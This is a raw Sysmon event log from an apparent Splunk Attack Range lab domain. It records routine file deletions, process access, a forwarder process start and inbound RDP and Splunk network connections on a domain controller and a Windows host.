09:12:33.308{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4309MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:34.486{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6C5AC8DF60EC024C2C43FC842C32B4D,SHA256=9CA7528806059EB2A6A07042C279AF76EC9A22A6ED5CF313E7E253263B7F5BC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:35.505{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B582E0F1437DF3E76A8A63B81E895BC6,SHA256=DB9AE191F7019A0A7E7AF7B4388436FC272BC0700F5F36F586FD206A0D12623A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979010Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:35.810{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81B7F77052CF7434D45D63B12D954806,SHA256=890EE50DF039E0CAB1BFB5521FFF1CE243E8B459DB4012E01703346631EC9C65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979009Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:34.998{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF9FCCC696CA009BC038F1D7AAB4BFD6,SHA256=3E352193B58AEF562F824ABEB1111A60A401F86500336771313EA47D74EA4D0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:36.666{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:36.520{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B17EE1ACEA966A17C6BA24CDF3600B4,SHA256=BCABE036358DE80F93B85CC64005891A32258DDDC4EEEFBAE95A534553DBC867,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979011Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:36.013{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1583DBF3169EB129A1421EE6D2BAED05,SHA256=B30F321E9E03C61FD266FEE78788D9347B04881A1816DA00AE800C44CDF9DFD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:37.535{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E5408F5CC46EEF0BD68D7F166D2F878,SHA256=FC2C9B43DC43814143F6F7CC6CD084E7D026EC651C860288A869E50E3105D9E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979026Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B05-6151-CD79-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979025Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979024Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979023Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979022Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979021Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979020Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979019Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979018Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979017Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979016Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8B05-6151-CD79-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979015Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.420{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B05-6151-CD79-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979014Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.405{69CF5F33-8B05-6151-CD79-00000000FD01}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000979013Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:33.134{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62301-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979012Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:37.029{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E9311EF461365626F2D24109D72AC66,SHA256=D9AB371FF9BBAA9BBB87F72860B9C48CA7880674A6B615155649B17229F4AFC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:38.650{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28F88E0A0799F37AB8A6F8112AEF2668,SHA256=F31A5A2E9ECB850C286AB5A4ABF0AFDB3AC74A00B2E4845079C62D693A28FC34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:38.650{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5037186D54E943C94BF2C2DA120B122,SHA256=FF219C931C22C7794F590ED1DC72811870E6BA19ED17EED8569286167FD63065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:38.585{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6564C7C5B5B15A038E8DE46DFA2B0B3,SHA256=C6BA1D82C25ABC586CB07B6EC204FE4228112B4ACBFA89D60D4F7B2AAC396635,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979028Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:38.638{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A37687F5C0F165D8F25251CC8428CF76,SHA256=4EC7178D91CBF97D829C5F29374A6B7D6B86D6E7444965E6E711C78C76D3471F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979027Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:38.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3440175548D768B8F445A465BB26727C,SHA256=EADA0BDB86024C1FD767D8F95CC7AA8A402AC8C13C144738B0735D40B4150108,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:36.342{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53377-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001050310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:35.877{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53376-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:39.981{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:39.603{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=134A85A153355A8D96C4091CA8CD21DD,SHA256=C93077CEFA6A292D7FA45F1821761F2DC350E85637B2F509404438D73CE963B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979033Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:36.116{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.35.135unn-212-102-35-135.cdn77.com63315-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979032Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:36.052{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-59151-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979031Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:35.811{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59394-false10.0.1.12-8000- 354300x8000000000000000979030Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:35.672{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63926-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979029Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:39.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EDF587E5141179E221B9051588EF7E3,SHA256=16BE1F266645926ADD7D622F069A6B6689A469C00AB4C9F3B1027981C6122D5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:39.282{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B2A7BB556B4BDAD1F388EA88D6A88D83,SHA256=4DEFDFBA608EB19EB3F7A17C47B197B9B166BD634C84247521E0FDF904AAB6F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:36.985{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60393-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050321Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:40.618{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F4A99177B03FFAF6BE7D9EAB846FB7,SHA256=B8756373C22D2F0C55A60B1EED4D3E5118C7CCF6D9CAF03B34D8232F3CFBBF3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979034Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 